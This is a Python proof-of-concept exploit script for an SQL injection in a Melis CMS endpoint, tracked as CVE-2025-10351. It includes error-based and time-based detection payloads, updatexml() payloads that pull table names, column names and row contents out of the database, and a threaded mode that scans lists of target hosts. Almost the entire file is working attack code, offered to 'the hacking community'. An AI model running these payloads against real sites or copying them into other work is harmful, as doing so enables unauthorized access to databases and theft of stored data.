# --- Page-scrape residue (commented out so the file parses as Python) ---
# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / CVE-2025-10351-POC.py PY
#!/usr/bin/env python3
#===========================================================================================#
#         _______      ________    ___   ___ ___  _____      __  ___ ____  _____ __         #
#        / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|    /_ |/ _ \___ \| ____/_ |        #
#       | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__  | |        #
#       | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ | |        #
#       | |____   \  /  | |____    / /_| |_| / /_ ___) |     | | |_| |__) |___) || |        #
#        \_____|   \/   |______|  |____|\___/____|____/      |_|\___/____/|____/ |_|        #
#                                                                                           #
#                                                                                           #
#      Made with love for the hacking community <3         Manuel Iván San Martín Castillo  #
#===========================================================================================#

import requests
import argparse
import html
import time
import urllib3
import concurrent.futures
from colorama import Fore, Style, init
from prettytable import PrettyTable
from urllib.parse import urlparse, urlsplit, parse_qs, urlunsplit
from bs4 import BeautifulSoup

# Disable SSL warnings for self-signed certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Initialize color output
init(autoreset=True)

# Toggle debug details for requests/responses in make_petition
DEBUG_REQ = False


def remove_html_tags(text):
    """Strip every HTML tag from *text*, returning only the visible text."""
    soup = BeautifulSoup(text, "html.parser")
    return soup.get_text()


def is_time_based_sqli(session, url, payload_true, payload_false, sleep_time, threshold=0.9):
    """Detect time-based SQLi by comparing latencies of a sleeping vs. non-sleeping payload."""
    request_timeout = sleep_time + 5
    try:
        # Baseline: payload that should NOT trigger a delay.
        started = time.time()
        session.get(url + requests.utils.requote_uri(payload_false), timeout=request_timeout)
        baseline = time.time() - started

        # Probe: payload that should make the server SLEEP().
        started = time.time()
        session.get(url + requests.utils.requote_uri(payload_true), timeout=request_timeout)
        delayed = time.time() - started

        # Vulnerable when the sleeping payload took (almost) sleep_time longer.
        return (delayed - baseline) >= sleep_time * threshold

    except requests.exceptions.Timeout:
        # A timeout strongly suggests the injected SLEEP actually fired.
        return True
    except Exception:
        return False


def check_endpoint(host, port, endpoint, cookie, proxy_str=None, disable_verify=False):
    """
    Main logic to check if a given endpoint is vulnerable to SQLi.

    Uses a requests.Session so cookie/headers persist across exploitation
    requests. proxy_str and disable_verify are passed through so the
    recursive re-check (after the user supplies a cookie) keeps the same
    settings.

    :param host: target base including scheme (e.g. "https://example.com")
    :param port: target port (string or int)
    :param endpoint: vulnerable path ending in "param=" (the injection point)
    :param cookie: PHPSESSID value, or "" when unauthenticated
    :param proxy_str: optional proxy URL applied to both http and https
    :param disable_verify: when True, skip TLS certificate verification
    """
    base_url = f"{host}:{port}"
    # Inject a single quote right after '=' to provoke a SQL syntax error.
    endpoint_with_quote = endpoint.replace("=", "='")
    url_with_quote = f"{base_url}/{endpoint_with_quote}"

    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
        }
        cookies = {"PHPSESSID": cookie} if cookie else {}

        # Use a session to keep cookies and headers consistent across all requests
        session = requests.Session()
        session.headers.update(headers)
        if cookies:
            session.cookies.update(cookies)

        # Apply proxy and TLS behavior (explicit, no env)
        if proxy_str:
            session.proxies = {"http": proxy_str, "https": proxy_str}
            session.trust_env = False

        # session.verify respects the --insecure flag
        session.verify = not disable_verify

        # initial check - follow redirects so we can spot login pages
        response = session.get(url_with_quote, allow_redirects=True, timeout=5)

        # Authentication-required detection: a redirect to a login page shows
        # up in response.history, or as a final URL different from the one we
        # requested. BUGFIX: requests percent-encodes the injected quote
        # (' -> %27), so response.url never byte-matches the raw
        # url_with_quote; compare against the requoted form to avoid a false
        # [AUTH REQUIRED] on every target.
        expected_url = requests.utils.requote_uri(url_with_quote)
        if not args.url_list and (response.history or (response.url and response.url != expected_url)):
            print(f"{base_url} {Fore.YELLOW}[AUTH REQUIRED]{Style.RESET_ALL}")
            new_cookie = ask_for_cookies()
            if new_cookie and len(new_cookie) >= 8:
                # Re-run the whole check with the freshly supplied cookie.
                return check_endpoint(host, port, endpoint, new_cookie, proxy_str, disable_verify)
            elif new_cookie:
                print(f"{base_url} {Fore.BLUE}[INVALID COOKIE]{Style.RESET_ALL}")
            return

        # Error-based SQLi detection (MySQL syntax error, or the xpath error
        # message that updatexml() produces)
        if "You have an error in your SQL syntax" in response.text or "xpath" in response.text.lower():
            print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Error-Based SQLi")
            if args.all_tables or args.table:
                ask_to_exploit(f"{base_url}/{endpoint}", session)
        else:
            base = f"{base_url}/"

            # True delay payload (sleep happens)
            payload_true = endpoint.replace(
                "=",
                f"=1 AND (SELECT 1 FROM (SELECT(SLEEP({int(args.sleep)})))test)"
            )

            # False payload (no delay)
            payload_false = endpoint.replace(
                "=",
                "=1 AND (SELECT 1 FROM (SELECT(1))test)"
            )

            if is_time_based_sqli(session, base, payload_true, payload_false, args.sleep):
                print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Time-Based SQLi")
                print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} WARNING: Time-Based exploitation is not supported.")
            else:
                print(f"{base_url} {Fore.GREEN}[NOT VULNERABLE]{Style.RESET_ALL}")

    except requests.exceptions.SSLError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} SSL Error")
    except requests.exceptions.ConnectionError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} Connection Error")
    except Exception as e:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} General Error: {e}")


def process_url_list(file_path, endpoint, cookie, proxy_str=None, disable_verify=False):
    """Read targets from a file and scan each one (tolerant input parsing + thread pool)."""
    try:
        seen = set()
        targets_all = []

        with open(file_path, 'r', encoding='utf-8', errors='ignore') as handle:
            for raw in handle:
                entry = raw.strip()

                # Ignore blank lines and comments.
                if not entry or entry.startswith("#"):
                    continue

                candidates = []

                if "://" in entry:
                    # Case 1: full URL with an explicit scheme.
                    parts = urlparse(entry)
                    scheme = parts.scheme.lower() if parts.scheme else "http"
                    host = parts.hostname
                    if not host:
                        continue
                    port = parts.port if parts.port else (443 if scheme == "https" else 80)
                    candidates.append((f"{scheme}://{host}", str(port)))
                else:
                    # Case 2/3: bare host/IP, optionally with :port.
                    parts = urlparse(f"//{entry}")
                    host = parts.hostname
                    if not host:
                        continue
                    port = parts.port
                    if port:
                        # Guess TLS for the usual HTTPS ports.
                        scheme = "https" if port in {443, 8443, 9443, 10443} else "http"
                        candidates.append((f"{scheme}://{host}", str(port)))
                    else:
                        # No port given: probe both HTTPS and HTTP defaults.
                        candidates.append((f"https://{host}", "443"))
                        candidates.append((f"http://{host}", "80"))

                # Deduplicate while preserving order.
                for target in candidates:
                    if target in seen:
                        continue
                    seen.add(target)
                    targets_all.append(target)

        if not targets_all:
            print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] URL list is empty or no valid targets found.")
            return

        # Threads suit this workload: almost all time is spent waiting on I/O.
        max_workers = 20  # tune up/down as needed; 20 is a sane default
        with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as pool:
            pending = [
                pool.submit(check_endpoint, full_host, port, endpoint, cookie, proxy_str, disable_verify)
                for full_host, port in targets_all
            ]

            # Drain results so worker exceptions surface instead of vanishing.
            for future in concurrent.futures.as_completed(pending):
                try:
                    future.result()
                except Exception as e:
                    print(f"[{Fore.YELLOW}X{Style.RESET_ALL}] Worker error: {e}")

    except Exception as e:
        print(f"[{Fore.RED}ERROR{Style.RESET_ALL}] Failed to process URL list: {e}")



def ask_to_exploit(url, session):
    """Prompt before exploiting a confirmed SQLi; reuse *session* so cookies carry over."""
    answer = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Do you want to attempt exploitation? (y/n): ").strip().lower()
    if answer not in ('y', 'yes'):
        print(f"[{Fore.BLUE}X{Style.RESET_ALL}] Exploitation aborted.")
        return
    exploit_error_based(url, args.sleep, session)


def ask_for_cookies():
    """Offer a recheck with a PHPSESSID cookie; return the value, or None if declined."""
    answer = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Recheck with cookies? (y/n): ").strip().lower()
    if answer not in ('y', 'yes'):
        return None
    return input(f"[{Fore.YELLOW}-{Style.RESET_ALL}] Enter PHPSESSID cookie: ").strip()

def make_petition(session, url, payload_template, sleep_time, output_file, data_type):
    """
    Perform the repeated error-based extraction requests for one payload template.

    The template must contain the placeholders {ITERATOR} (substring start,
    advanced 31 characters per request) and {OFFSET} (row index, 0..99).
    Data is read back out of the server's xpath error message, delimited by
    '~' characters. Even a single short result (e.g. '~changelog~') is kept.

    :param session: requests.Session carrying auth cookies/headers
    :param url: injection URL, either with a query string or ending in '='
    :param payload_template: SQL payload with {ITERATOR}/{OFFSET} placeholders
    :param sleep_time: delay between requests (seconds)
    :param output_file: file to append results to, or 'null' to skip writing
    :param data_type: label used in console output ('table'/'column'/'data')
    :return: list of extracted row strings
    """
    # Truncate the output file up front so results from a previous run
    # don't mix with this one (writes below use append mode).
    if output_file and output_file.lower() != 'null':
        open(output_file, 'w').close()

    extracted_rows = []
    # Consecutive responses without an extractable fragment. NOTE(review):
    # not reset between offsets, so once it reaches 5, later empty rows bail
    # out after a single request each — appears intentional as a fast stop.
    no_data_counter = 0

    # Decide how to deliver the payload: as a proper query parameter when the
    # URL has a query string, otherwise by appending to a URL ending in '='.
    parsed = urlsplit(url)
    param_name = None
    base_for_request = url
    if parsed.query:
        qs = parse_qs(parsed.query)
        if qs:
            # Use the first query parameter as the injection point.
            param_name = list(qs.keys())[0]
            base_for_request = urlunsplit((parsed.scheme, parsed.netloc, parsed.path, '', ''))
    else:
        if '=' in url and url.rstrip().endswith('='):
            idx = url.rfind('=')
            last_part = url[:idx].split('/')[-1]
            param_name = last_part if last_part else 'id'
            base_for_request = url[:idx+1].rstrip('=')

    use_params = bool(param_name)

    # One outer iteration per database row (LIMIT 1 OFFSET n), max 100 rows.
    for offset in range(0, 100):
        CHAIN = ""          # accumulated value for this row
        ITERATOR = 1        # 1-based substring start position
        ended = False       # NOTE(review): assigned but never read
        data_fragment = ""

        while True:
            payload = payload_template.format(ITERATOR=ITERATOR, OFFSET=offset)
            try:
                if use_params:
                    params = {param_name: payload}
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {base_for_request} params={params}")
                    response = session.get(base_for_request, params=params, allow_redirects=False, timeout=3)
                else:
                    exploit_url = url + requests.utils.requote_uri(payload)
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {exploit_url}")
                    response = session.get(exploit_url, allow_redirects=True, timeout=3)

                if DEBUG_REQ:
                    print(f"[DEBUG] status={response.status_code} url={response.url}")
                    snippet = response.text[:800].replace("\n", "\\n")
                    print(f"[DEBUG] resp snippet: {snippet}")

                # Strip tags and HTML entities so the xpath error is plain text.
                response_text = html.unescape(remove_html_tags(response.text))
                lines = response_text.splitlines()
                found_data = False

                for line in lines:
                    if "xpath" in line.lower():
                        # Preferred form: data wrapped between ~ ~ delimiters.
                        if "~" in line:
                            extracted = line.split("~")
                            if len(extracted) > 1:
                                data_fragment = extracted[1].split("'")[0] if "'" in extracted[1] else extracted[1]
                        elif ":" in line:
                            # Fallback: take whatever follows the last colon.
                            data_fragment = line.split(":")[-1].strip()
                        else:
                            data_fragment = line.strip()

                        if data_fragment:
                            found_data = True
                            CHAIN += data_fragment
                            if DEBUG_REQ:
                                print(f"[DEBUG] extracted fragment: '{data_fragment}'")

                if found_data:
                    no_data_counter = 0
                else:
                    no_data_counter += 1

                # Give up after 5 consecutive empty responses.
                if no_data_counter >= 5:
                    break

                # Advance the substring window (31-char step for 32-char reads).
                ITERATOR += 31
                time.sleep(sleep_time)

            except requests.RequestException as e:
                if DEBUG_REQ:
                    print(f"[DEBUG] request exception: {e}")
                break

        # Make sure a single short result is not lost when CHAIN stayed empty.
        if not CHAIN and data_fragment:
            CHAIN = data_fragment

        if CHAIN:
            extracted_rows.append(CHAIN)
            print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Extracted {data_type}: {Fore.BLUE}{CHAIN}{Style.RESET_ALL}")
            if output_file and output_file.lower() != 'null':
                with open(output_file, 'a') as f:
                    f.write(CHAIN + '\n')

    print(f"\n[{Fore.RED}X{Style.RESET_ALL}] Finished extraction process.\n")
    return extracted_rows

def display_table(data_list, columns, output_file):
    """Render extracted rows ('||'-separated) as a PrettyTable; optionally append it to a file."""
    print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Table with data")
    table = PrettyTable()
    table.field_names = columns

    last_index = len(data_list) - 1
    for position, raw_row in enumerate(data_list):
        cells = raw_row.split("||")
        # Only rows matching the expected column count are shown.
        if len(cells) != len(columns):
            continue
        table.add_row(cells)
        if position < last_index:
            table.add_divider()

    print(table)
    if output_file and output_file.lower() != 'null':
        with open(output_file, 'a') as out:
            out.write(str(table) + '\n')


def extract_tables(session, url, sleep_time, tables_filename):
    """Enumerate every table name in the current database via error-based extraction."""
    # updatexml() leaks data through its XPath error; 0x7e = '~' delimiter.
    template = (
        "1 OR updatexml(null, concat(0x7e, "
        "(SELECT substring(table_name, {ITERATOR}, 32) "
        "FROM information_schema.tables WHERE table_schema=database() "
        "LIMIT 1 OFFSET {OFFSET}), 0x7e), null)"
    )
    make_petition(session, url, template, sleep_time, tables_filename, 'table')


def extract_columns(session, url, sleep_time, table_name):
    """Enumerate the column names of *table_name* and return them as a list."""
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting columns from table: {table_name}")
    # 0x7e = '~' delimiter around each leaked fragment.
    template = (
        f"1 OR updatexml(null, concat(0x7e, "
        f"(SELECT substring(column_name, {{ITERATOR}}, 32) "
        f"FROM information_schema.columns WHERE table_name='{table_name}' "
        f"LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
    )
    return make_petition(session, url, template, sleep_time, 'null', 'column')


def extract_data_from_columns(session, url, sleep_time, table_name, columns):
    """Dump the given comma-separated *columns* from *table_name* and show them in a table."""
    parsed = urlparse(url)
    origin = f"{parsed.scheme}://{parsed.netloc}"
    column_list = columns.split(',')
    # 0x7c7c = '||' — the in-band cell separator within each extracted row.
    joined_columns = ", 0x7c7c, ".join(column_list)

    template = (
        f"1 OR updatexml(null, concat(0x7e, "
        f"(SELECT substring(concat({joined_columns}), {{ITERATOR}}, 32) "
        f"FROM {table_name} LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
    )
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting data from {origin}")
    rows = make_petition(session, url, template, sleep_time, f"{table_name}_data.txt", 'data')

    if rows:
        display_table(rows, column_list, f"{table_name}_data.txt")


def exploit_error_based(url, sleep_time, session):
    """Drive error-based extraction according to the CLI flags, reusing *session* for auth."""
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Attempting Error-Based SQL Injection on {url}")
    print(f"{Fore.YELLOW}!{Style.RESET_ALL} WARNING: Large data may not extract properly")

    if args.all_tables:
        extract_tables(session, url, sleep_time, "tables_extracted.txt")
        return
    if not args.table:
        return
    if args.all_columns:
        # Discover the columns first, then dump all of them.
        found = extract_columns(session, url, sleep_time, args.table)
        if found:
            extract_data_from_columns(session, url, sleep_time, args.table, ",".join(found))
    elif args.columns:
        extract_data_from_columns(session, url, sleep_time, args.table, args.columns)
    else:
        extract_columns(session, url, sleep_time, args.table)


if __name__ == "__main__":
    # CLI entry point: single target (-u/-p), or a list of targets (-l).
    usage = "CVE-2025-10351.py -u <URL> -p <PORT> | -l <URL_LIST> [-s <SLEEP_TIME>] [-at] [-t <TABLE>] [-ac]"
    parser = argparse.ArgumentParser(
        usage=usage,
        add_help=False,
        description="Script to check and exploit CVE-2025-10351.",
    )

    parser.add_argument("-u", "--url", help="Target URL (e.g. https://www.example.com)")
    parser.add_argument("-p", "--port", help="Port (e.g. 80, used only with --url)")
    parser.add_argument("-l", "--url-list", help="File with URLs to check (one per line)")
    parser.add_argument("-s", "--sleep", type=float, default=1.0, help="Sleep time (default: 1s)")
    parser.add_argument("-at", "--all-tables", action='store_true', help="Extract all tables.")
    parser.add_argument("-t", "--table", help="Specify a table name to extract columns.")
    parser.add_argument("-ac", "--all-columns", action='store_true', help="Extract all column data (requires -t).")
    parser.add_argument("-c", "--columns", help="Specify columns to extract (comma-separated).")
    parser.add_argument("--proxy", help="Proxy URL (no env). Example: http://127.0.0.1:8080")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS verification (useful for intercepting HTTPS with Burp)")
    parser.add_argument("--cookie", help="PHPSESSID cookie (optional). Example: abc123")
    parser.add_argument("--debug", action="store_true", help="Enable verbose request/response debug for extraction")
    parser.add_argument("-h", "--help", action='help', default=argparse.SUPPRESS, help="Show help message.")

    args = parser.parse_args()

    # Turn on verbose request/response logging when asked.
    if args.debug:
        DEBUG_REQ = True

    # Vulnerable Melis CMS endpoint targeted by CVE-2025-10351.
    endpoint = "melis/MelisCms/PageEdition/getTinyTemplates?idPage="

    # Optional PHPSESSID supplied on the command line.
    cookie_arg = args.cookie or ""

    if args.url and args.port:
        check_endpoint(args.url, args.port, endpoint, cookie_arg, args.proxy, args.insecure)
    elif args.url_list:
        process_url_list(args.url_list, endpoint, cookie_arg, args.proxy, args.insecure)
    else:
        parser.print_help()